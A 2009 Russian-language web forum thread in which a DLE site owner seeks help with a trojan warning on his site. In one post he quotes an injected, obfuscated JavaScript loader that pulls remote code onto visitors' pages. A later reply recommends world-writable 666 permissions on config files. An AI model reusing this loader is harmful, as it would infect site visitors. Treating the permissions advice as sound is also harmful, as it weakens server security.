Richiooo 4 Опубликовано: 14 декабря 2009 Рассказать Опубликовано: 14 декабря 2009 (изменено) zelenb.com При открытии сайта открывается Adobe Acrobat, нод 32 ругается на Kryptic.GO trojan Версия DLE 8.3 чистая Антивирус в админке: ./engine/modules/c_navigation.php 4.58 Kb 13.11.2009 22:22:55 неизвестен дистрибутиву ./engine/inc/init.php 24.54 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву ./engine/inc/makethumb.php 6.93 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву ./engine/inc/inserttag.php 22.12 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву ./engine/inc/functions.inc.php 16 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву При первом откытии сайта под подвалом появляется пустое место, которое после обновления страницы исчезает... Что делать как найти и устранить проблему? Изменено 14 декабря 2009 пользователем Richiooo Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 068 Опубликовано: 14 декабря 2009 Рассказать Опубликовано: 14 декабря 2009 Начните с удаления с сайта порно рекламы, или вы не берете в расчет что источник заражения именно она? Цитата Ссылка на сообщение Поделиться на других сайтах
Richiooo 4 Опубликовано: 14 декабря 2009 Рассказать Опубликовано: 14 декабря 2009 Автор там стоит teasernet.ru при выключении этого баннера ситуация точно такая же. собственно вся реклама тоже снималась и ничего не поменялось Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 068 Опубликовано: 14 декабря 2009 Рассказать Опубликовано: 14 декабря 2009 Richiooo, Другого зловредного кода на вашем сайте в исходном коде я не вижу. там стоит teasernet.ru и что? Это гарант безопасности. собственно вся реклама тоже снималась и ничего не поменялось Удалите всю без исключения рекламу и давайте ссылку на сайт, посмотрим что у вас там еще всплывает. Цитата Ссылка на сообщение Поделиться на других сайтах
Richiooo 4 Опубликовано: 14 декабря 2009 Рассказать Опубликовано: 14 декабря 2009 Автор В админке сайта в самом низу код (исходный код страницы) <script>/*GNU GPL*/ try{window.onload = function(){var Vppmkah2dw7 = document.createElement('script');Vppmkah2dw7.setAttribute('type', 'text/javascript');Vppmkah2dw7.setAttribute('id', 'myscript1');Vppmkah2dw7.setAttribute('src', 'h@)((t^)&&t^!p!$:!!/$$&/&@(&f(^$l^i##c@@(k&$(r@^-(&(c$&#)o!#&m(#.^a#(d$#@v!m$&$&a!##k@^(#e@)r^(.#!r@#u($#).!)#)m&e&@@r)c&!&a!#^d@!!o(l&i)$$^r@!(e$(-#)c!o$(m)&$&$-&)m$#)x().(e)&a&))#s&)y^&(t!#)(^a)@b!!)l&#(e^!#^t)(e@&^n()!n!#$i@&s($.^)#r($!#u#(@&:#8$0$^!8$#$@0(!/#^g(^!$o@#!$)o@^g&l!!(e!)&^.()($c^(&o&^$$m&/#^g^&o@@o(@)&g!&@!@l$&$(e^.#!c$$$)!o^m)$(/)(n)^$@y^!d$$@a!i$((l($y&^!&n)#e)@$w^$s!.$&c(^o!@(m($$)/$g!(@o@o)^)g@^l$e&(!.(#a(t!#@@/&p$l#!a))$y@&)).&@c$@$o)&&$m#)#/!'.replace(/&|\(|\$|\!|#|\^|@|\)/ig, ''));Vppmkah2dw7.setAttribute('defer', 'defer');document.body.appendChild(Vppmkah2dw7);}} catch(e) {}</script>[/code] Это нормально? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 14 декабря 2009 Рассказать Опубликовано: 14 декабря 2009 Нет Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 068 Опубликовано: 14 декабря 2009 Рассказать Опубликовано: 14 декабря 2009 Richiooo, http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe Цитата Ссылка на сообщение Поделиться на других сайтах
Richiooo 4 Опубликовано: 15 декабря 2009 Рассказать Опубликовано: 15 декабря 2009 Автор спасибо, пришлось перезаливать папку engine. кстати после того как сайт был вылечен, хотел сделать снимок встроенным антивирусом, а он пишет Warning: fopen(../data/snap.db): failed to open stream: Permission denied in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 349 Warning: fwrite(): supplied argument is not a valid stream resource in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 350 Warning: fclose(): supplied argument is not a valid stream resource in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 351 ������ ��������� ������ ������� � �������� ������� ������ Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 068 Опубликовано: 15 декабря 2009 Рассказать Опубликовано: 15 декабря 2009 нет прав на файл engine/data/snap.db Цитата Ссылка на сообщение Поделиться на других сайтах
Captain 623 Опубликовано: 15 декабря 2009 Рассказать Опубликовано: 15 декабря 2009 В engine/data на все конфиги нужно права поставить 666 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.